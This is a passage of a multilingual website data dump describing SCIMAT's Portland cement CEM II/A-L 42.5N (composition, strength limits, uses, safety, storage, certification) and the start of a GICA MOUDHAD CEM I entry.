<p><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Recommandations Spécifiques et Générales</u> :</strong></span></span></span></p>
<ul>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des granulats propres, exempts de matières organiques;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Respecter les dosages et les règles de l’art pour la mise en œuvre;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Viser un rapport Eau/Ciment de préférence le plus faible possible, compatible avec une bonne rhéologie du béton frais;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des adjuvants normalisés;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Éviter une dessiccation précoce par temps chaud ou venteux en réalisant une cure du béton (arrosage, bâche humide, produits de cure…);</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Adapter la vibration du béton à sa consistance pour obtenir une compacité optimale sans ségrégation;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Éviter tout contact avec la peau et les yeux;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des équipements adaptés : gants, chaussures imperméables, lunettes…</span></span></span></span></p>
</li>
</ul>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#FF0000"><u><strong>Sécurité</strong></u> :<strong> </strong></span></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT vise à être l'employeur le plus sûr de la Société par l’amélioration des conditions de travail pour éviter toutes blessures corporelles et répercussions sanitaires liées à ses activités.</span></span></span></span></p>
<p><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong>Mesures de Protection</strong></u><strong> :</strong></span></span></span></p>
<ul>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Mélanger à l'eau, le Ciment est irritant; </span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Éviter le contact avec les yeux et la peau;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Laver immédiatement et abondamment à l'eau toute zone exposée; </span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">En cas de contact avec les yeux, consulter impérativement un médecin. </span></span></span></span></p>
</li>
</ul>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour plus de détails,Veuillez- vous reporter à la Fiche de Données de Sécurité détaillée.</span></span></span></span></p>
<div class="source_url_spacer">
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#006400"><u><strong>Environnement</strong></u><strong> :</strong></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT vise à être en permanence un exemple de la responsabilité écologique de la Société par la protection de l’environnement, y compris la prévention de la pollution et l’utilisation de ressources durables et ce par<em> </em> :</span></span></span></span></p>
<ul>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La préservation des ressources naturelles;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La réduction des rejets atmosphériques;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La maitrise de la gestion des déchets. </span></span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"> <u><strong>Stockage</strong></u><strong> :</strong></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le Ciment doit être stocké au sec et protégé de l'humidité. </span> <span style="color:#008000"><strong> </strong></span></span></span></span></p>
<p><span style="color:#40E0D0"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Conditionnement</u> :</strong></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le <strong>Ciment Portland CEM II A-L 42.5 N</strong> est livré en vrac et en sacs de 50 kg.</span></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u><span style="color:#000080">Certification</span></u><span style="color:#000000"> :</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"><span dir="ltr" lang="fr">Le <strong>Ciment CEM II/A (P-L) 42,5N</strong> est certifié selon la <strong>Norme Algérienne 442/2013 </strong>à la Marque de Conformité Nationale <strong>TEDJ</strong> délivrée par l’Institut Algérien de Normalisation -IANOR-</span>.</span></span></span></p>
</div>
',
'contenu_ara' => '<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><u><span style="color:#008000"><strong>التركيبة</strong></span></u><span style="color:#008000"><strong> :</strong></span></span></span></p>
<p style="text-align:right"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">الاسمنت البورتلاندي بالحجر الجيري <strong>CEM II/A-L 42,5N </strong> ناتج عن خليط الكلنكر بكمية لا تقل عن 88-82٪ ومكونات أخرى مثل Tuff & Pozzolane ، والتي لا يتجاوز مجموعها 7 -13٪.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>القيم الحدية</strong></u><strong> :</strong></span></span></span></p>
<div id="tw-target">
<div class="g9WsWb" id="kAz1tf">
<div class="tw-ta-container hide-focus-ring tw-lfl" id="tw-target-text-container">
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يتم تعيين قيم الحد الأدنى من القوة لمدة 2 و 28 يومًا. يتم أيضًا تعيين القيم الحدية لمحتوى SO3 أقل من 3.5٪ ومحتوى أيون الكلوريد أقل من 0.10٪</span></span></p>
</div>
</div>
</div>
<p style="text-align:center"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong><span style="color:#008000">قيمة حد قوة الانضغاط لـ CEM II / A-L 42.5N </span></strong></span></span></p>
<table border="1" cellpadding="1" cellspacing="1" style="height:186px; width:431px">
<tbody>
<tr>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>حد القوة وفقًا للمعيار NA 442</strong></span></span></span></td>
<td dir="rtl" style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الحد الأدنى المحدد لأسمنت SCIMAT</strong></span></span></span></td>
<td dir="rtl" style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الحد الأعلى المحدد لأسمنت SCIMAT</strong></span></span></span></td>
<td style="text-align:center">
<p><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>فئة المقاومة </strong></span></span></span></p>
</td>
</tr>
<tr>
<td style="text-align:center">
<p><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong></span></span></span> <span style="font-size:16px"><span style="font-family:times new roman,times,serif"><small><strong><span style="color:rgb(50, 50, 50)">≥</span></strong></small></span></span> <span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>10,0</strong></span></span></span></p>
</td>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>22.08</strong></span></span></span></td>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>25.98</strong></span></span></span></td>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>يومًان</strong></span></span></span></td>
</tr>
<tr>
<td style="text-align:center"><strong>62.5≤res≥42,5</strong></td>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>44,18</strong></span></span></span></td>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>48.49</strong></span></span></span></td>
<td dir="rtl" style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>يومًا28</strong></span></span></span></td>
</tr>
</tbody>
</table>
<p style="text-align:right"> </p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>رقابة الجودة</strong></u><strong> :</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تقوم SCIMAT بان<span style="color:#000000">ت</span>اج وتسويق الأسمنت عالي <strong>الجودة</strong> وفقًا للمعايير الجزائرية المعمول بها. يتم فحصها بشكل دوري من قبل مركز الدراسات والخدمات ا<span style="color:#000000">لتكنولوجية </span>لصناعة مواد البناء -CETIM-(المعتمد وفقًا لمعيار ISO 17025).</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong><u><span style="color:#008000">مجالات الاستعمال الرئيسية:</span></u></strong></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يعتبر <strong>CEM II / A-L 42.5N</strong> مناسبًا لجميع أنواع أعمال الخرسانة المسلحة. الأسمنت الخاص بنا مناسب للخرسانة سابقة الإجهاد والخرسانة المسلحة. بشكل عام ، يعتبر <strong>CEM II / A-L 42.5N</strong> مناسبًا تمامًا للأعمال الضخمة التي تتطلب ارتفاعًا معتدلًا في درجة الحرارة. سيتم تفضيل الفئة R للعمل الذي يتطلب نقاط قوة أولية أعلى. للعمل في بيئات عدوانية ، سيتم استخدام الأسمنت للعمل في البحر (PM) أو مقاومة للمياه الكبريتية (ES).</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>إحتياطات خاصة </strong></u><strong>:</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#000000">عندما يكون الجانب الجمالي مهمًا (الخرسانة الخام ، اللصقات) ، فمن المستحسن تجنب استخدام <strong>CEM II</strong> الذي يشتمل على نسب كبيرة من المكونات التي قد تسبب اختلافات ملحوظة في اللون ، وخاصة الرماد المتطاير.</span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>توصيات محددة وعامة</strong></u><strong> :</strong></span></span></span></p>
<ul dir="rtl">
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدام ركام نظيف وخالي من المواد العضوية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> احترام الجرعات وقواعد فن التنفيذ ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تهدف إلى نسبة الماء / الأسمنت ، ويفضل أن تكون منخفضة قدر الإمكان ، ومتوافقة مع الانسيابية الجيدة للخرسانة الطازجة ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدام مواد مساعدة معيارية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب الجفاف المبكر في الطقس الحار أو العاصف عن طريق معالجة الخرسانة (الري ، القماش المشمع الرطب ، منتجات المعالجة ، إلخ) ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تكييف اهتزازات الخرسانة مع قوامها للحصول على تماسك أمثل بدون فصل ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب ملامسة الجلد والعينين ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدم المعدات المناسبة: القفازات ، والأحذية المقاومة للماء ، والنظارات ، وما إلى ذلك.</span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="color:#FF0000"><u><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">الحماية :</span></span></strong></u></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تهدف SCIMAT إلى أن تكون الشركة الأكثر أمانًا في المجتمع من خلال تحسين ظروف العمل لتجنب أي إصابات جسدية وتداعيات صحية مرتبطة بأنشطتها</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>تدابير وقائية:</strong></u></span></span></span></p>
<ul dir="rtl">
<li style="text-align:left">
<p style="text-align:justify"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> يخلط مع الماء ، والأسمنت مزعج.</span></span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب ملامسة العينين والجلد؛</span></span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> اغسل جميع المناطق المكشوفة على الفور بكمية كبيرة من الماء ؛</span></span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> في حالة ملامسة العين لا بد من استشارة الطبيب.</span></span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">لمزيد من التفاصيل ، يرجى الرجوع إلى ورقة بيانات السلامة التفصيلية. </span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>البيئة</strong></u><strong>:</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تهدف SCIMAT إلى أن تكون بشكل دائم مثالاً للمسؤولية البيئية للمجتمع من خلال حماية البيئة ، بما في ذلك منع التلوث واستخدام الموارد المستدامة من خلال:</span></span></p>
<ul dir="rtl">
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> الحفاظ على الموارد الطبيعية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> الحد من انبعاثات الغلاف الجوي ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> التمكن من إدارة النفايات</span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong><u>التخزين:</u> </strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يجب تخزين الأسمنت في مكان جاف وحمايته من الرطوبة</span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong></strong></span></span></span><br />
</p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#40E0D0"><u><strong>التكييف</strong></u><strong> : </strong></span><span style="color:#008000"><strong> </strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يتم تسليم الأسمنت البورتلاندي <strong>CEM II A-L 42.5 N</strong> سائبًا وفي أكياس سعة 50 كجم. </span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#000080"><strong> <u>الشهادة</u> :</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif; font-size:16px">تم اعتماد </span><strong>CEM II / A (P-L) 42.5N</strong><span style="font-family:times new roman,times,serif; font-size:16px"> وفقًا للمعيار الجزائري </span><strong>2013/442</strong><span style="font-family:times new roman,times,serif; font-size:16px"> مع علامة المطابقة الوطنية </span><strong>TEDJ</strong><span style="font-family:times new roman,times,serif; font-size:16px"> الصادرة عن المعهد الجزائري للتقييس -IANOR-.</span></p>
',
'contenu_en' => '<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Composition</strong></u><strong> :</strong></span><br />
The <strong>Cement Portland</strong> with Limestone <strong>CEM II/A-L 42,5N -NA 442/2013</strong>- results from the mixture of clinker in a quantity at least equal to 88-82% and other constituents such as Tuff & Pozzolana, the total of which does not exceed 7-13%.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Limit Values</strong></u></span><strong> :</strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The limit values for minimum strengths are set for 2 and 28 days. The limit values are also set for the SO3 content below 3.5% and the chloride ion content below 0.10%.</span></span></p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:#008000">Compressive strength limit value for CEM II / A-L 42.5N -NA 442/2013-</span></strong></span></span></p>
<table align="center" border="1" cellpadding="0" cellspacing="0" style="height:413px; width:425px">
<tbody>
<tr>
<td style="height:88px; width:110px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Resistance Class</strong></span></span></p>
<p style="text-align:center"> </p>
<p style="text-align:center"> </p>
</td>
<td style="height:88px; width:142px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limit of Resistance according to Standard NA 442</strong></span></span></p>
</td>
<td style="height:88px; width:120px">
<p style="text-align:center"> </p>
<div class="QmZWSe">
<div class="DHcWmd" style="text-align: center;"> </div>
</div>
<div class="oSioSc">
<div id="tw-target">
<div class="g9WsWb" id="kAz1tf">
<div class="tw-ta-container hide-focus-ring tw-nfl" id="tw-target-text-container">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Specified Lower Limit<br />
of our Cement</strong></span></span></p>
</div>
</div>
</div>
</div>
<p style="text-align:center"> </p>
</td>
<td style="height:88px; width:151px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Specified Upper Limit of our Cement</strong></span></span></p>
<p style="text-align:center"> </p>
</td>
</tr>
<tr>
<td style="height:85px; width:110px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>02 days</strong></span></span></p>
</td>
<td style="height:85px; width:142px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>≥ 10,0</strong></span></span></p>
</td>
<td style="height:85px; width:120px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>22.08</strong></span></span></p>
</td>
<td style="height:85px; width:151px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>25.98</strong></span></span></p>
</td>
</tr>
<tr>
<td style="height:57px; width:110px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>28 days</strong></span></span></p>
</td>
<td style="height:57px; width:142px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>62.5≤res≥42,5</strong></span></span></p>
</td>
<td style="height:57px; width:120px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>44,18</strong></span></span></p>
</td>
<td style="height:57px; width:151px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>48.49</strong></span></span></p>
</td>
</tr>
</tbody>
</table>
<div style="clear:both;"> </div>
<div style="clear:both;">
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Quality Control</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">SCIMAT manufactures and markets <strong>Quality</strong> Cements in accordance with Algerian Standards in force. They are periodically checked by the Center for Studies and Technological Services of the Building Materials Industry -CETIM- (accredited according to the ISO 17025 Standard).</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong><span style="color:#008000">Main fields of employment</span></strong></u><strong><span style="color:#008000"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>CEM II/A-L 42,5N</strong> -<strong>NA 442/2013-</strong>is suitable for all types of reinforced concrete work. Our Cement is suitable for prestressed concrete and reinforced concrete. In general, the<strong> CEM II/A-L 42,5N</strong> -<strong>NA 442/2013-</strong> is well suited for massive work requiring a moderate rise in temperature. The Class R will be preferred for work requiring higher initial strengths. For work in aggressive environments, the Cement will be used for work at sea (PM) or resistant to sulphated water (ES).</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Special precautions</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">When the aesthetic aspect is important (raw concrete, plasters), it is advisable to avoid the use of certain <strong>CEM II</strong> comprising large proportions of constituents liable to cause too marked variations in color, particularly fly ash.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Specific and General Recommendations</strong></u><strong> :</strong></span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use clean aggregates, free from organic matter;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Respect the dosages and the rules of the art for the<br />
implementation;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Aim for a Water /Cement ratio, preferably as low<br />
as possible, compatible with good rheology of<br />
fresh concrete;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use standardized adjuvants;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Avoid premature drying out in hot or windy weather by curing the concrete (watering, damp tarpaulin, curing products, etc.); </span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Adapt the vibration of the concrete to its consistency<br />
to obtain optimum compactness without segregation;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Avoid all contact with skin and eyes;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use suitable equipment : gloves, waterproof shoes, glasses, etc.</span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#FF0000"><strong><u>Security</u> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The SCIMAT aims to be the safest employer in the Society by improving working conditions to avoid any bodily injury and health repercussions related to its activities.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Protective Measures</strong></u><strong> :</strong></span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Mix with water, the Cement is irritating;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Avoid contact with eyes and skin;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Immediately wash all exposed areas with plenty of water;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> In the event of contact with the eyes, it is essential to consult a doctor.</span></span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">For more details, please refer to the detailed Safety Data Sheet.</span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong><span style="color:#008000">Environment</span></strong></u><strong><span style="color:#008000"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">The SCIMAT aims to be a constant example of the ecological responsibility of the </span>Society<span style="color:#000000"> through the protection of the environment, including the prevention of pollution and the use of sustainable resources by:</span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Preservation of natural resources;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Reduction of atmospheric emissions;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Mastery of waste management.</span></span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><u><strong>Storage</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The Cement must be stored in a dry place and protected from humidity.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong><u>Conditioning</u> :</strong></span><br />
The <strong>Cement Portland CEM II / AL 42.5N-NA 442/2013-</strong> is delivered in bulk and in bags of 50 kg.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong><span style="color:#4B0082">Certification</span></strong></u><strong><span style="color:#4B0082"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Cement Portland CEM II / AL 42.5N</strong> is certified according to the <strong>Algerian Standard 442/2013</strong> with the National Conformity Mark <strong>TEDJ</strong> issued by the Algerian Institute for Standardization -IANOR-.</span></span></p>
</div>
',
'img_prd' => 'produit-1716888973.png',
'img_prd_detail' => '',
'Code_Pr' => '78999',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1716804329.pdf',
'pos_slider' => '9'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 7 => array(
'Produit' => array(
'id' => '89963',
'nom_fr' => 'GICA MOUDHAD ',
'nom_ara' => 'جيكا مضاد',
'nom_en' => 'GICA MOUDHAD',
'sous_nom_fr' => 'CEM I 42.5 N-LH/SR5',
'sous_nom_ara' => 'CEM I 42.5 N-LH/SR5',
'sous_nom_en' => 'CEM I 42.5 N-LH/SR5',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Composition</strong></u><strong> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:black">Le <strong>Ciment CEM I/42.5 N-LH/SR5 -NA 442/2013</strong>- </span> est un Ciment Portland résultant du broyage de clinker et de sulfate de calcium (gypse ou anhydrite) pour régulariser la prise, et éventuellement de constituants secondaires en faible quantité inférieure à 5 %. La teneur en clinker est au minimum de 95 %.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:#008000"><u>Valeurs limites</u> :</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">En plus des valeurs caractéristiques des classes de résistance, la Norme prévoit le respect de valeurs limites de résistance à la compression applicables à chaque résultat d’essai. Ces résistances sont mesurées sur «mortier normal» selon la <strong>Norme NA 442-2013 </strong>inspirée de la <strong>Norme Européenne NF EN 196-1</strong>.</span></span></p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong>Valeur Limite de Résistance à la Compression pour CEM I/42.5 N-LH/SR5</strong></span></span></span></p>
<table align="center" border="1" cellpadding="0" cellspacing="0" style="height:339px; width:420px">
<tbody>
<tr>
<td style="height:104px; width:117px">
